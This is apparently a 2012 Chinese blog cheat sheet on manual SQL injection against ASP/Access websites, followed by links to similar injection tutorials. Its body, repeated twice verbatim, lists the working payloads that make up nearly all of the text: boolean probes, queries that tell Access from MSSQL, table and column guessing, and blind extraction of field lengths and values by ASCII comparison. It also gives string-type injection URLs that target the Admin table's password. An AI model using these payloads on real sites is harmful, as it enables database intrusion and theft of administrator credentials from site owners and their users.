access基本手工注入
2012-02-20 18:50
183 查看
判断
1=1,1=2
1>2,1<2
判断数据库类型
and (select count (*) from msysobjects)>0 异常access
and (select count (*) from sysobjects)>0 mssql正常
猜表名
and 0<>(select count(*) from 表名)
猜列名
and 0<>(select count(列名) from 表名)
猜字段长度
and (select top 1 len(username) from admin)>0
and (select top 1 len(username) from admin)>1
and (select top 1 len(username) from admin)>2
and (select top 1 len(username) from admin)>3
如果>5返回错误页面,>4返回正确页面就说明字段的长度是5
猜字段值
and (select asc(mid(username,1,1)) from admin)>96
and (select asc(mid(username,2,1)) from admin)>96
ascii是从0-255,使用2分法比较快。
字符型注入
http://www.hacker.com/default.asp?title=111111' and 1=(select top 1 count(*) from Admin where Asc(mid(password,3,1))="&s&") and '1'='1
http://www.hacker.com/default.asp?title=111111' and 1=1 and '1'='1 (替换中间的and1=1即可)
要加引号,后门要多加一个and‘1’=‘1,注意最后不关门。原select语句中有引号。
1=1,1=2
1>2,1<2
判断数据库类型
and (select count (*) from msysobjects)>0 异常access
and (select count (*) from sysobjects)>0 mssql正常
猜表名
and 0<>(select count(*) from 表名)
猜列名
and 0<>(select count(列名) from 表名)
猜字段长度
and (select top 1 len(username) from admin)>0
and (select top 1 len(username) from admin)>1
and (select top 1 len(username) from admin)>2
and (select top 1 len(username) from admin)>3
如果>5返回错误页面,>4返回正确页面就说明字段的长度是5
猜字段值
and (select asc(mid(username,1,1)) from admin)>96
and (select asc(mid(username,2,1)) from admin)>96
ascii是从0-255,使用2分法比较快。
字符型注入
http://www.hacker.com/default.asp?title=111111' and 1=(select top 1 count(*) from Admin where Asc(mid(password,3,1))="&s&") and '1'='1
http://www.hacker.com/default.asp?title=111111' and 1=1 and '1'='1 (替换中间的and1=1即可)
要加引号,后门要多加一个and‘1’=‘1,注意最后不关门。原select语句中有引号。
相关文章推荐
- MySQL数据库5.X版本基本手工注入总结(转)
- 新手科普 | MySQL手工注入之基本注入流程
- 手工ACCESS注入方法
- access手工注入笔记
- MySQL数据库5.X版本基本手工注入总结
- MySQL数据库5.X版本基本手工注入总结
- ACCESS手工注入学习笔记
- ACCESS 手工注入
- access手工注入
- MySQL数据库5.X版本基本手工注入总结
- PHP手工注入
- CBO—手工统计数据基本命令
- 扔掉工具,学会手工注入
- 手工注入一般步骤
- ASP加ACCESS数据的基本知识
- access的一些基本操作
- File类的基本操作之RandomAccessFile写入操作
- PHP+MySQL 手工注入语句大全 推荐
- spring依赖注入的基本方法及其原理
- SQL注入系列之ASP+ACCESS手动注入(一)----数字型